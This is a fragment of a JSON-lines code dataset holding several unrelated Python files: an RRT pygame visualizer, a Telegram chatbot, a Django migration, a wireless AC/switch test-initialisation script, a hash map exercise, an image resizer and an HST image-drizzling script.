\"\"\"\n\n reservation = add_reservations[0]\n reservation.hard_delete()\n\n assert reservation.id is None\n","sub_path":"tests/test_booking_app/test_reservation_model.py","file_name":"test_reservation_model.py","file_ext":"py","file_size_in_byte":1403,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"572809041","text":"'''\r\nCreated on Nov 3, 2014\r\n\r\n@author: daqing_yi\r\n'''\r\n\r\nimport pygame, sys\r\nfrom pygame.locals import *\r\nimport numpy as np\r\n\r\nclass BiRRTVisualizer(object):\r\n\r\n def __init__(self, rrt):\r\n self.rrt = rrt\r\n pygame.init()\r\n self.screen = pygame.display.set_mode((self.rrt.sampling_width,self.rrt.sampling_height))\r\n pygame.display.set_caption('RRT')\r\n self.screen.fill((255,255,255))\r\n if self.rrt.mapfile != None:\r\n self.mapImg = pygame.image.load(self.rrt.mapfile)\r\n else:\r\n self.mapImg = None\r\n \r\n self.objImg = None\r\n \r\n self.activePaths = []\r\n self.dispMap = True\r\n \r\n self.refLines = []\r\n \r\n self.states = (\"START\", \"GOAL\", \"BOTH\")\r\n self.currentState = 2\r\n \r\n self.font = pygame.font.SysFont(None, 24)\r\n \r\n self.pathIdx = 0\r\n \r\n def loadObj(self, objFile): \r\n self.objImg = pygame.image.load(objFile)\r\n \r\n def update(self):\r\n \r\n for e in pygame.event.get():\r\n if e.type == QUIT or (e.type == KEYUP and e.key == K_ESCAPE):\r\n sys.exit(\"Quit it.\")\r\n if e.type == KEYDOWN:\r\n if e.key == pygame.K_m:\r\n if self.dispMap==True:\r\n self.dispMap = False\r\n else:\r\n self.dispMap = True\r\n elif e.key == pygame.K_LEFT:\r\n self.pathIdx -= 1\r\n elif e.key == pygame.K_RIGHT:\r\n self.pathIdx += 1\r\n \r\n if self.pathIdx >= len(self.activePaths):\r\n self.pathIdx = 0\r\n \r\n self.screen.fill((255,255,255))\r\n if self.dispMap==True:\r\n if self.mapImg != None:\r\n self.screen.blit(self.mapImg,(0,0))\r\n else:\r\n if self.objImg != None:\r\n self.screen.blit(self.objImg,(0,0))\r\n \r\n for refLine in self.refLines:\r\n pygame.draw.line(self.screen, (50,50,50), refLine[0], refLine[1])\r\n \r\n for dr in self.rrt.dividingRefs:\r\n pygame.draw.line(self.screen, (255,204,153), dr[0], dr[1], 10)\r\n \r\n if self.currentState==0 or self.currentState==2: \r\n for n in self.rrt.st_nodes:\r\n for c in n.children:\r\n #print str(n.pos) + \"-\" + str(c.pos)\r\n n_pos = (int(n.pos[0]), int(n.pos[1]))\r\n c_pos = (int(c.pos[0]), int(c.pos[1]))\r\n pygame.draw.line(self.screen, (128,200,0), n_pos, c_pos)\r\n\r\n if self.rrt.st_new_node != None and self.rrt.st_connected_node != None:\r\n new_node = (int(self.rrt.st_new_node[0]), int(self.rrt.st_new_node[1]))\r\n connected_node = (int(self.rrt.st_connected_node[0]), int(self.rrt.st_connected_node[1]))\r\n pygame.draw.line(self.screen, (200,128,0), new_node, connected_node)\r\n \r\n \r\n if self.currentState==1 or self.currentState==2:\r\n for n in self.rrt.gt_nodes:\r\n for c in n.children:\r\n #print str(n.pos) + \"-\" + str(c.pos)\r\n n_pos = (int(n.pos[0]), int(n.pos[1]))\r\n c_pos = (int(c.pos[0]), int(c.pos[1]))\r\n pygame.draw.line(self.screen, (200,128,0), n_pos, c_pos)\r\n\r\n if self.rrt.gt_new_node != None and self.rrt.gt_connected_node != None:\r\n new_node = (int(self.rrt.gt_new_node[0]), int(self.rrt.gt_new_node[1]))\r\n connected_node = (int(self.rrt.gt_connected_node[0]), int(self.rrt.gt_connected_node[1]))\r\n pygame.draw.line(self.screen, (200,128,0), new_node, connected_node)\r\n \r\n if len(self.activePaths) > 0:\r\n activePath = self.activePaths[self.pathIdx]\r\n pathLen = 
len(activePath)\r\n for i in range(0, pathLen-1, 1):\r\n pos1 = (int(activePath[i][0]), int(activePath[i][1]))\r\n pos2 = (int(activePath[i+1][0]), int(activePath[i+1][1]))\r\n pygame.draw.line(self.screen, (0, 102, 204), pos1, pos2, 2) \r\n \r\n self.screen.blit(self.font.render(\"PI:\"+str(self.pathIdx), True, (255,0,0)), (self.rrt.sampling_width-40, 10))\r\n \r\n start = (int(self.rrt.start[0]), int(self.rrt.start[1]))\r\n goal = (int(self.rrt.goal[0]), int(self.rrt.goal[1]))\r\n pygame.draw.circle(self.screen, (255,0,0), start, 5)\r\n pygame.draw.circle(self.screen, (0,0,255), goal, 5) \r\n \r\n \r\n \r\n pygame.display.flip();\r\n\r\n ","sub_path":"Proj/HomotopyProj/homotopyRRT/BiRRTVisualizer.py","file_name":"BiRRTVisualizer.py","file_ext":"py","file_size_in_byte":4754,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"48282700","text":"#!/usr/bin/python3\r\n\r\nimport telebot\r\nfrom telebot.types import Message\r\nimport sqlite3\r\nimport random\r\nimport apiai, json\r\n\r\n\r\nTOKENTG = ''\r\nTOKENAI = ''\r\nbot = telebot.TeleBot(TOKENTG)\r\n\r\n@bot.message_handler(content_types=['sticker'])\r\ndef sticker_handler(message: Message):\r\n ##############\r\n #\r\n ran = random.randint(1, 9)\r\n\r\n conn = sqlite3.connect('dbase.db')\r\n cursor = conn.cursor()\r\n\r\n cursor.execute(f'SELECT STICKER FROM STICKERS WHERE ID={ran}')\r\n\r\n result = str(cursor.fetchall())\r\n\r\n stick = result[3:-4]\r\n ##############\r\n bot.send_sticker(message.chat.id, stick)\r\n\r\n@bot.message_handler(content_types=['text'])\r\n@bot.edited_message_handler(content_types=['text'])\r\ndef send_echo(message):\r\n randm = random.randint(1, 9)\r\n if randm >= 2:\r\n request = apiai.ApiAI(TOKENAI).text_request()\r\n request.lang = 'ru'\r\n request.session_id = 'AndryAI'\r\n request.query = message.text\r\n responseJson = json.loads(request.getresponse().read().decode('utf-8'))\r\n response = responseJson['result']['fulfillment']['speech']\r\n #######################################\r\n if response:\r\n bot.send_message(message.chat.id, response)\r\n else:\r\n bot.send_message(message.chat.id, '))')\r\n\r\n\r\nbot.polling( none_stop = True)\r\n","sub_path":"Andrybot.py","file_name":"Andrybot.py","file_ext":"py","file_size_in_byte":1330,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"481572061","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('tagging', '0015_auto_20150406_2127'),\n ]\n\n operations = [\n migrations.AlterModelOptions(\n name='operation',\n options={'ordering': ['date_started']},\n ),\n ]\n","sub_path":"mapping/tagging/migrations/0016_auto_20150408_0637.py","file_name":"0016_auto_20150408_0637.py","file_ext":"py","file_size_in_byte":380,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"259128509","text":"#-*- coding: UTF-8 -*-#\n#*******************************************************************************\n# waffirm_initial.py\n#\n# Author: ()\n#\n# Version 1.0.0\n#\n# Copyright (c) 2004-2008 Digital China Networks Co. 
Ltd\n#\n# Features: 初始设置\n# 2012-12-4 10:01:57\n#*******************************************************************************\n# Change log:\n# - 2017.2.27 lupingc RDM46364 获取ap1 dhcp option60版本号\n# - 2017.6.1 lupingc ac1配置登录用户名和密码\n# - 2017.10.27 zhangjxp RDM50238\n# - 2017.11.10 zhangjxp RDM50321\n#*******************************************************************************\nimport os\nimport time\nimport re\nimport wx\n\ndef reloadallsut(**kargs):\n '''\n 功能:使用多线程重启所有设备\n 参数:AP或SWITCH类型的设备,参数格式:AP=[ap1,ap2],SWITCH=[switch1,switch2,switch3]\n 返回:None\n 举例:reloadallsut(AP=[ap1,ap2],SWITCH=[switch1,switch2,switch3]) \n 备注:此函数基本只在初始化过程中使用,其他用例中用到的概率极少\n '''\n threadslist = []\n for type in list(kargs.keys()):\n if type=='AP':\n for ap in kargs[type]:\n # Apcmdtype = Ap1cmdtype if ap == 'ap1' else Ap2cmdtype\n Apcmdtype = Ap1cmdtype\n t = CallThread(RebootAp,'AP',150,0,'admin','admin',True,AP=ap,apcmdtype=Apcmdtype)\n threadslist.append(t)\n if type=='SWITCH':\n for switch in kargs[type]:\n t = CallThread(ReloadMultiSwitch,[switch])\n threadslist.append(t)\n for t in threadslist:\n t.start()\n for t in threadslist:\n t.join()\n\n#记录日志\nprintInitialTimer('TestCase Initial','Start')\n\n#各设备恢复出厂设置\nif set_default == 1:#this defined in topo file\n print('setting default')\n SetDefault(switch1)\n SetDefault(switch3)\n Receiver(switch1,'write',timeout=1)\n Receiver(switch3,'write',timeout=1)\n IdleAfter(1)\n Receiver(switch1,'y',timeout=2)\n Receiver(switch3,'y',timeout=2)\n #使用多线程对各设备同时进行重启操作\n reloadallsut(AP=ap_name_list,SWITCH=[switch1,switch3])\n\nSetTerminalLength(switch1)\nSetWatchdogDisable(switch1)\nSetExecTimeout(switch1)\nSetTerminalLength(switch3)\nSetWatchdogDisable(switch3)\nSetExecTimeout(switch3)\n\nprintRes('Check the software version of s1...')\nShowVersion(switch1)\n\nSetCmd(pc1,'cd /root')\nSetCmd(pc1,'service dhcpd stop')\nSetCmd(sta1,'cd /root')\nSetCmd(sta1,'service dhcpd stop')\nSetCmd(sta2,'cd /root')\nSetCmd(sta2,'service dhcpd stop')\n\nprint('initialing ')\n#交换机初始配置\n#--------------------------- 初始化AC1 ---------------------------------------\nEnterInterfaceMode(switch1,'loopback 1')\nSetCmd(switch1,'ip address',StaticIpv4_ac1,'255.255.255.255')\nSetCmd(switch1,'ipv6 address',StaticIpv6_ac1+'/128')\nEnterConfigMode(switch1)\nSetCmd(switch1,'vlan '+Vlan1)\nEnterInterfaceMode(switch1,s1p1)\nSetCmd(switch1,'switchport access vlan '+Vlan1)\nEnterInterfaceMode(switch1,'vlan '+Vlan1)\nIdleAfter(Vlan_Idle_time)\nSetCmd(switch1,'no ip address')\nSetCmd(switch1,'ip address',If_vlan1_s1_ipv4,'255.255.255.192')\n#配置wireless视图下的参数\nEnterWirelessMode(switch1)\nSetCmd(switch1,'keep-alive-interval 10000')\nSetCmd(switch1,'keep-alive-max-count 3')\nSetCmd(switch1,'country-code cn')\nSetCmd(switch1,'channel enhance disable')\nSetCmd(switch1,'enable')\nSetCmd(switch1,'static-ip',StaticIpv4_ac1)\nSetCmd(switch1,'static-ipv6',StaticIpv6_ac1)\nEnterWirelessMode(switch1)\nSetCmd(switch1,'no auto-ip-assign')\nSetCmd(switch1,'no discovery vlan-list',1)\nSetCmd(switch1,'discovery vlan-list',Vlan1)\n#配置Network1\nEnterNetworkMode(switch1,1)\nSetCmd(switch1,'ssid ' + Network_name1)\nSetCmd(switch1,'vlan ' + Vlan4091) \n\nfor i in range(total_apnum):\n #配置Ap-profile1\n EnterApProMode(switch1,i+1)\n SetCmd(switch1,'hwtype',ap_hwtype_list[i])\n SetCmd(switch1,'radio '+radio1num)\n SetCmd(switch1,'rf-scan other-channels interval 5')\n SetCmd(switch1,'rf-scan duration 50')\n SetCmd(switch1,'vap 1')\n SetCmd(switch1,'enable')\n SetCmd(switch1,'exit')\n SetCmd(switch1,'exit')\n SetCmd(switch1,'radio 
'+radio2num)\n SetCmd(switch1,'mode ac')\n SetCmd(switch1,'vap 1')\n SetCmd(switch1,'enable')\n EnterWirelessMode(switch1)\n SetCmd(switch1,'ap database',ap_mac_list[i])\n SetCmd(switch1,'profile',i+1)\n #配置Discovery ip-list\n # EnterWirelessMode(switch1)\n # SetCmd(switch1,'discovery ip-list',ap_ipv4_list[i]) \n\nEnterConfigMode(switch1)\nSetCmd(switch1,'username '+Ssh_login_name+' privilege 15 password 0 '+Ssh_login_password)\nSetCmd(switch1,'router rip')\nSetCmd(switch1,'network 0.0.0.0/0')\n\n# 集中转发、本地转发差异化配置,如测试集中转发,AC1需进行如下配置\nif testcentral == True:\n print('s1 initial centralizedforwarding')\n EnterConfigMode(switch1)\n # SetCmd(switch1,'no interface vlan 1')\n SetCmd(switch1,'vlan',Vlan4091 + '-' + Vlan4093)\n EnterInterfaceMode(switch1,'vlan '+Vlan4091)\n IdleAfter(Vlan_Idle_time)\n SetCmd(switch1,'ip address',If_vlan4091_s1_ipv4,'255.255.255.0')\n SetCmd(switch1,'ipv6 address',If_vlan4091_s1_ipv6+'/64')\n EnterInterfaceMode(switch1,'vlan '+Vlan4092)\n IdleAfter(Vlan_Idle_time)\n SetCmd(switch1,'ip address',If_vlan4092_s1_ipv4,'255.255.255.0')\n #开启DHCP\n EnterConfigMode(switch1)\n SetCmd(switch1,'service dhcp')\n SetCmd(switch1,'ip dhcp excluded-address ' + If_vlan4091_s1_ipv4)\n SetCmd(switch1,'ip dhcp excluded-address ' + If_vlan4091_s2_ipv4)\n SetCmd(switch1,'ip dhcp excluded-address ' + If_vlan4092_s1_ipv4)\n SetCmd(switch1,'ip dhcp excluded-address ' + If_vlan4092_s2_ipv4)\n SetCmd(switch1,'ip dhcp pool pool4091')\n SetCmd(switch1,'network-address ' + Dhcp_pool1 + '0 255.255.255.0')\n SetCmd(switch1,'default-router ' + If_vlan4091_s1_ipv4)\n SetCmd(switch1,'exit')\n SetCmd(switch1,'ip dhcp pool pool4092')\n SetCmd(switch1,'network-address ' + Dhcp_pool2 + '0 255.255.255.0')\n SetCmd(switch1,'default-router ' + If_vlan4092_s1_ipv4)\n SetCmd(switch1,'exit')\n # 配置wireless模式,开启集中转发\n EnterWirelessMode(switch1)\n SetCmd(switch1,'l2tunnel vlan-list add',Vlan4091 + '-' + Vlan4093)\n \n\n\n# # #--------------------------- 初始化AP ---------------------------------------\n# for i in range(total_apnum):\n # SetCmd(ap_name_list[i],'\\n')\n # ApSetcmd(ap_name_list[i],ap_cmdtype_list[i],'set_static_ip',ap_ipv4_list[i])\n # ApSetcmd(ap_name_list[i],ap_cmdtype_list[i],'set_dhcp_down')\n # ApSetcmd(ap_name_list[i],ap_cmdtype_list[i],'set_dhcpv6_down')\n # ApSetcmd(ap_name_list[i],ap_cmdtype_list[i],'set_ip_route',If_vlan1_s3_ipv4)\n # ApSetcmd(ap_name_list[i],ap_cmdtype_list[i],'saverunning') \n#--------------------------- 初始化 S3 ---------------------------------------\n\n#vlan1\nEnterConfigMode(switch3)\nSetCmd(switch3,'vlan '+Vlan1)\nSetCmd(switch3,'switchport interface',s3p1)\n# SetCmd(switch3,'switchport interface',s3p3)\nSetCmd(switch3,'switchport interface',s3p6)\nEnterInterfaceMode(switch3,'vlan '+Vlan1)\nIdleAfter(Vlan_Idle_time)\nSetIpAddress(switch3,If_vlan1_s3_ipv4,'255.255.255.192')\n\n#vlan192\nEnterConfigMode(switch3)\nSetCmd(switch3,'vlan',Vlan192)\nSetCmd(switch3,'switchport interface',s3p5)\nEnterInterfaceMode(switch3,'vlan '+Vlan192)\nIdleAfter(Vlan_Idle_time)\nSetIpAddress(switch3,If_vlan192_s3_ipv4,'255.255.255.0')\n\n#router rip\nEnterConfigMode(switch3)\nSetCmd(switch3,'router rip')\nSetCmd(switch3,'network 0.0.0.0/0')\nEnterEnableMode(switch3)\n\nEnterConfigMode(switch3)\nSetCmd(switch3,'vlan '+Vlan1)\nfor i in range(total_apnum):\n SetCmd(switch3,'switchport interface',ap_s3port_list[i])\n# 集中转发、本地转发差异化配置,如测试本地转发,S3需进行如下配置\nif testcentral == False:\n print('s3 initial localforwarding')\n EnterConfigMode(switch3)\n # SetCmd(switch3,'no interface vlan 1')\n 
SetCmd(switch3,'vlan',Vlan4091 + '-' + Vlan4093)\n EnterInterfaceMode(switch3,'vlan '+Vlan4091)\n IdleAfter(Vlan_Idle_time)\n SetCmd(switch3,'ip address',If_vlan4091_s1_ipv4,'255.255.255.0')\n SetCmd(switch3,'ipv6 address',If_vlan4091_s1_ipv6+'/64')\n EnterInterfaceMode(switch3,'vlan '+Vlan4092)\n IdleAfter(Vlan_Idle_time)\n SetCmd(switch3,'ip address',If_vlan4092_s1_ipv4,'255.255.255.0')\n \n #开启DHCP\n EnterConfigMode(switch3)\n SetCmd(switch3,'service dhcp')\n SetCmd(switch3,'ip dhcp excluded-address',If_vlan4091_s1_ipv4)\n SetCmd(switch3,'ip dhcp excluded-address',If_vlan4092_s1_ipv4)\n SetCmd(switch3,'ip dhcp excluded-address',updateserver)\n SetCmd(switch3,'ip dhcp excluded-address',If_vlan1_s3_ipv4)\n SetCmd(switch3,'ip dhcp excluded-address',If_vlan1_s1_ipv4)\n SetCmd(switch3,'ip dhcp pool vlan4091')\n SetCmd(switch3,'network',Dhcp_pool1 + '2 24')\n SetCmd(switch3,'default-router',If_vlan4091_s1_ipv4)\n SetCmd(switch3,'exit')\n SetCmd(switch3,'ip dhcp pool vlan4092')\n SetCmd(switch3,'network',Dhcp_pool2 + '2 24')\n SetCmd(switch3,'default-router',If_vlan4092_s1_ipv4)\n SetCmd(switch3,'exit')\n SetCmd(switch3,'ip dhcp pool vlan'+Vlan1)\n SetCmd(switch3,'network',If_vlan1_s3_ipv4,'26')\n SetCmd(switch3,'default-router',If_vlan1_s3_ipv4)\n SetCmd(switch3,'exit')\n \n EnterConfigMode(switch3)\n for i in range(total_apnum):\n SetCmd(switch3,'interface',ap_s3port_list[i])\n SetCmd(switch3,'switchport mode trunk')\n SetCmd(switch3,'switchport trunk native vlan '+Vlan1)\n\n#----------------------- PC1,STA1,STA2 配置实验网路由,保持控制连接-------------------------------\n# 配置PC1默认网关\nSetCmd(pc1,'route add -net default gw',If_vlan192_s3_ipv4)\n#----------------------- 初始化STA1,STA2,开启wpa_supplicant-------------------------------\nSetCmd(sta1,'ifconfig ' + Netcard_sta1 + ' up')\nSetCmd(sta1,'rm -rf /tmp/capture/*.cap')\nSetCmd(sta1,'rm -rf /tmp/wpa_log/*.log')\nSetCmd(sta1,'rm -rf /root/nohup.out')\n#开启sta1,sta2的wpa_supplicant\nSetCmd(sta1,'ifconfig %s up' % Netcard_sta1)\nIdleAfter(2)\ndata = SetCmd(sta1,'iwconfig')\nif CheckLine(data,'%s' % Netcard_sta1)!=0:\n SetCmd(sta1,'rmmod iwldvm')\n SetCmd(sta1,'rmmod iwlwifi')\n IdleAfter(5)\n SetCmd(sta1,'modprobe iwlwifi')\n#data = SetCmd(sta1,'ifconfig mon0')\nif CheckLine(data,'mon0')!=0:\n SetCmd(sta1,'airmon-ng start ' + Netcard_sta1)\nIdleAfter(2)\t\nSetCmd(sta1,'pkill -9 wpa_supplicant')\nIdleAfter(3)\nSetCmd(sta1,'wpa_supplicant -B -i '+ Netcard_sta1 +' -c /etc/wpa_supplicant/wpa_supplicant.conf -f /tmp/wpa_log/%s.log' % Netcard_sta1)\n\nSetCmd(sta2,'ifconfig ' + Netcard_sta2 + ' up')\nSetCmd(sta2,'rm -rf /tmp/capture/*.cap')\nSetCmd(sta2,'rm -rf /tmp/wpa_log/*.log')\nSetCmd(sta2,'rm -rf /root/nohup.out')\nSetCmd(sta2,'ifconfig %s up' % Netcard_sta2)\nIdleAfter(2)\ndata = SetCmd(sta2,'iwconfig')\nif CheckLine(data,'%s' % Netcard_sta2)!=0:\n SetCmd(sta2,'rmmod iwldvm')\n SetCmd(sta2,'rmmod iwlwifi')\n IdleAfter(5)\n SetCmd(sta2,'modprobe iwlwifi')\n#data = SetCmd(sta2,'ifconfig mon0')\nif CheckLine(data,'mon0')!=0:\n SetCmd(sta2,'airmon-ng start ' + Netcard_sta2)\nIdleAfter(2)\nSetCmd(sta2,'pkill -9 wpa_supplicant')\nIdleAfter(3)\nSetCmd(sta2,'wpa_supplicant -B -i '+ Netcard_sta2 +' -c /etc/wpa_supplicant/wpa_supplicant.conf -f /tmp/wpa_log/%s.log' % Netcard_sta2)\n\n######################## 保存各交换机配置 ###################\nEnterEnableMode(switch1)\nSetCmd(switch1,'clock set 09:00:00 2012.12.21')\nIdleAfter('1')\ndata = SetCmd(switch1,'write',timeout=1)\nSetCmd(switch1,'y',timeout=2)\nSetCmd(switch1,'show 
run')\n\nEnterEnableMode(switch3)\nSetCmd(switch3,'clock set 09:00:00 2012.12.21')\nIdleAfter('1') \nEnterEnableMode(switch3)\ndata = SetCmd(switch3,'write',timeout=1)\nSetCmd(switch3,'y',timeout=2)\nSetCmd(switch3,'show run')\n#检测AC1是否成功管理AP1\nEnterEnableMode(switch1)\n# CheckSutCmd(switch1,'show wireless ap status', \\\n # check=[(ap1mac,'Managed','Success')], \\\n # waittime=5,retry=20,interval=5,IC=True)\n# WirelessApplyProfileWithCheck(switch1,['1'],[ap1mac])\nprofile_list = []\nfor i in range(total_apnum):\n CheckSutCmd(switch1,'show wireless ap status | include ' + ap_mac_list[i], \\\n check=[(ap_mac_list[i],'Managed','Success')], \\\n waittime=2,retry=5,interval=5,IC=True)\n profile_list.append(str(i+1))\nWirelessApplyProfileWithCheck(switch1,profile_list,ap_mac_list)\n \ndata6 = SetCmd(switch1,'show wireless')\nif re.search('CN - China',data6) is None:\n wx.MessageBox('AP not set to country code CN - China')\n\n\nprintInitialTimer('TestCase Initial','End')","sub_path":"autoTests/performance_test/performance_initial_oneap.py","file_name":"performance_initial_oneap.py","file_ext":"py","file_size_in_byte":12629,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"8888514","text":"\"\"\"\n不使用任何内建的哈希表库设计一个哈希映射(HashMap)。\n\n实现 MyHashMap 类:\n\nMyHashMap() 用空映射初始化对象\nvoid put(int key, int value) 向 HashMap 插入一个键值对 (key, value) 。如果 key 已经存在于映射中,则更新其对应的值 value 。\nint get(int key) 返回特定的 key 所映射的 value ;如果映射中不包含 key 的映射,返回 -1 。\nvoid remove(key) 如果映射中存在 key 的映射,则移除 key 和它所对应的 value 。\n\"\"\"\n\n\nclass Node:\n def __init__(self, key, val, next_node=None):\n self.key = key\n self.val = val\n self.next_node = next_node\n\n\nclass MyHashMap:\n\n def __init__(self):\n \"\"\"\n Initialize your data structure here.\n \"\"\"\n self._capacity = 1000\n self._table = [Node(-1, -1) for i in range(self._capacity)]\n\n def put(self, key: int, value: int) -> None:\n \"\"\"\n value will always be non-negative.\n \"\"\"\n hash_key = self._get_hash(key)\n node = self._get_node(key)\n if not node:\n new_node = Node(key, value)\n head = self._table[hash_key]\n new_node.next_node = head.next_node\n head.next_node = new_node\n else:\n node.val = value\n\n def get(self, key: int) -> int:\n \"\"\"\n Returns the value to which the specified key is mapped, or -1 if this map contains no mapping for the key\n \"\"\"\n node = self._get_node(key)\n return node.val if node else -1\n\n def remove(self, key: int) -> None:\n \"\"\"\n Removes the mapping of the specified value key if this map contains a mapping for the key\n \"\"\"\n hash_key = self._get_hash(key)\n pre = self._table[hash_key]\n cur = pre.next_node\n\n while cur:\n if cur.key == key:\n pre.next_node = cur.next_node\n pre = pre.next_node\n cur = cur.next_node\n\n def _get_node(self, key):\n \"\"\"\n 查找Key对应的Node\n \"\"\"\n hash_key = self._get_hash(key)\n node = self._table[hash_key].next_node\n\n while node:\n if node.key == key:\n return node\n node = node.next_node\n return None\n\n def _get_hash(self, key):\n return key % self._capacity\n","sub_path":"algorithm/LeetCode_706_设计哈希映射.py","file_name":"LeetCode_706_设计哈希映射.py","file_ext":"py","file_size_in_byte":2348,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"15034670","text":"import os\nimport sys\nimport glob\nfrom PIL import Image\n\nargs = sys.argv\nimagepath = os.path.abspath(args[1])\noutpath = os.path.abspath(args[2])\nimageList = []\n\nif os.path.exists(os.path.abspath(outpath)) == False:\n 
os.makedirs(os.path.abspath(outpath))\n\nclass Resize:\n    def __init__(self, width=256, height=256):\n        self.width = width\n        self.height = height\n        self.picture_size = (self.width, self.height)\n\n    def load_imagefile(self):\n        extlist = ["*.jpg", "*.jpeg", "*.JPEG", "*.jpe"]\n        for e in extlist:\n            filelist = glob.glob(os.path.join(imagepath, e))\n            imageList.extend(filelist)\n\n    def resize_imagefile(self):\n        for img in imageList:\n            resized_img = Image.open(img)\n            image = resized_img.resize(self.picture_size)\n            basename = os.path.basename(img)\n            name, ext = os.path.splitext(basename)\n\n            if ext != ".JPEG":\n                ext = ".JPEG"\n\n            imgname = name + ext\n            image.save(os.path.join(outpath, imgname))\n\n\nif __name__=='__main__':\n    resize = Resize(416, 416)\n    resize.load_imagefile()\n    resize.resize_imagefile()\n","sub_path":"resize_convert/resize_rename.py","file_name":"resize_rename.py","file_ext":"py","file_size_in_byte":1183,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}
+{"seq_id":"311809465","text":"#-------------------------------------------------------------------\n#-------------------------------------------------------------------\n#-------------------------------------------------------------------\n#--------------------------IMPORTS----------------------------------\n\nimport os\nimport glob\nimport drizzlepac\n\nfrom acstools import acs_destripe_plus\nfrom astropy.io import fits\nfrom drizzlepac import astrodrizzle\nfrom drizzlepac import updatenpol\nfrom stwcs import updatewcs\n\n#-------------------------------------------------------------------\n#-------------------------------------------------------------------\n#-------------------------------------------------------------------\n#--------------------PRELIMINARY INPUTS-----------------------------\n\n\ninput_dir = raw_input('What is the directory where the raw data is stored?')\noutput_dir = raw_input('What is the desired output directory?')\n\nmaindir = "/Users/jshanahan/Research/" + input_dir + '/'\noutdir = "/Users/jshanahan/Research/" + output_dir + '/'\ndir_list = glob.glob(maindir+"target???")\n\nos.environ["jref"] = "/Users/jshanahan/Research/crds_cache/references/hst/acs/"\nos.environ["CRDS_PATH"]="/Users/jshanahan/Research/crds_cache"\nos.environ["CRDS_SERVER_URL"]="https://hst-crds.stsci.edu"\n\nrun_dirorg = raw_input('Do the directories need to be organized by exposure time?').lower()\nif run_dirorg == 'yes':\n\tfor directory in dir_list:\n\t\tkey = os.path.basename(directory)\n\t\tfor f in glob.glob(directory + '/' +'*raw.fits'):\n\t\t\ttry:\n\t\t\t\twith fits.open(f, ignore_missing_end=True, mode='update') as hdu:\n\t\t\t\t\texptime = hdu[0].header['EXPTIME']\n\t\t\t\t\tif exptime <= 30.0:\n\t\t\t\t\t\ttry: \n\t\t\t\t\t\t\tos.mkdir(directory + '/shortexp')\n\t\t\t\t\t\texcept OSError:\n\t\t\t\t\t\t\tprint('Short exposure directory already exists for', key)\n\t\t\t\t\t\tos.rename(f,directory + '/shortexp/' + os.path.basename(f))\n\t\t\t\t\telse:\n\t\t\t\t\t\ttry:\n\t\t\t\t\t\t\tos.mkdir(directory + '/longexp')\n\t\t\t\t\t\texcept OSError:\n\t\t\t\t\t\t\tprint('Long exposure directory already exists for', key)\n\t\t\t\t\t\tos.rename(f,directory + '/longexp/' + os.path.basename(f))\n\t\t\texcept IOError:\n\t\t\t\tprint('An error occurred trying to read ', 
f)\n\n#-------------------------------------------------------------------\n#-------------------------------------------------------------------\n#-------------------------------------------------------------------\n#----------------------UPDATE HEADERS-------------------------------\n\n\nrun_headercorr = raw_input('Update headers for CTE correction?').lower()\nif run_headercorr == 'yes':\n\tfor directory in dir_list:\n\t\tshort_dir = directory + '/shortexp/'\n\t\tlong_dir = directory + '/longexp/'\n\t\tshortexp_raw = glob.glob(short_dir + '*raw.fits')\n\t\tlongexp_raw = glob.glob(long_dir + '*raw.fits')\n\t\tfor file in shortexp_raw:\n\t\t\twith fits.open(file, mode='update') as hdu: \n\t\t\t\thdu[0].header['PCTECORR'] = 'PERFORM'\n\t\tfor file in longexp_raw:\n\t\t\twith fits.open(file, mode='update') as hdu: \n\t\t\t\thdu[0].header['PCTECORR'] = 'PERFORM'\n\t\tprint('Headers updated for:',directory)\nelse:\n\tprint('Headers were not updated.')\n\nrun_crds = raw_input('Run CRDS?').lower()\nif run_crds == 'yes':\n\tcommand = 'crds bestrefs --update-bestrefs --sync-references=1 --files ' + maindir + 'target???/*/*raw.fits'\n\tos.system(command)\nelse:\n\tprint('CRDS not run.')\n#-------------------------------------------------------------------\n#-------------------------------------------------------------------\n#-------------------------------------------------------------------\n#-----------------CTE CORRECTION & DESTRIPING-----------------------\n\nrun_CTE = raw_input('Run the CTE correction and destriping?').lower()\nif run_CTE == 'yes':\n\tfor directory in dir_list:\n\t\tshort_dir = directory + '/shortexp/'\n\t\tlong_dir = directory + '/longexp/'\n\t\tshortfiles = glob.glob(short_dir + '*raw.fits')\n\t\tlongfiles = glob.glob(long_dir + '*raw.fits')\n\t\ttest_short = glob.glob(short_dir + '*.fits')\n\t\ttest_long = glob.glob(long_dir + '*.fits')\n\t\tif len(test_short) > 4.0:\n\t\t\tprint(\"Destriping already done.\")\n\t\telse:\n\t\t\tacs_destripe_plus.destripe_plus(shortfiles, cte_correct=True, verbose=True)\n\t\tif len(test_long) > 4.0:\n\t\t\tprint(\"Destriping already done.\")\n\t\telse:\n\t\t\tacs_destripe_plus.destripe_plus(longfiles, cte_correct=True, verbose=True)\n\t\tprint(\"Destriping complete for\", os.path.basename(directory))\nif run_CTE == 'no':\n\tprint(\"CTE correction and destriping skipped.\")\n\n#-------------------------------------------------------------------\n#-------------------------------------------------------------------\n#-------------------------------------------------------------------\n#-----------------------UPDATING IMAGES-----------------------------\n\nrun_update = raw_input('Update files?').lower()\nif run_update == 'yes':\n\tfiles = maindir + '/target???/*/*flc.fits'\n\tupdatewcs.updatewcs(files)\n\tupdatenpol.update(files, 'jref$')\nif run_update == 'no':\n\tprint(\"Files were not updated.\")\n\n#-------------------------------------------------------------------\n#-------------------------------------------------------------------\n#-------------------------------------------------------------------\n#--------------------------DRIZZLING--------------------------------\n\nrun_drizzle = raw_input('Drizzle files?').lower()\nif run_drizzle == 'yes':\n\tfor directory in dir_list:\n\t\ttarget = os.path.basename(directory)\n\t\tshort_dir = directory + '/shortexp/'\n\t\tshort_out_dir = outdir + target + '/' + 